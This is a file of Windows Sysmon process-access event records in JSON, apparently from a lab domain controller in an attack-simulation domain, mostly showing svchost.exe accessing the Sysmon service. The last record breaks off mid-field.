{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3737,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3738,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3739,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3740,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3741,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3742,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3743,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3744,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-00108A960500}\r\nTargetProcessId: 1092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-00108A960500}","TargetProcessId":"1092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3745,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.417\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 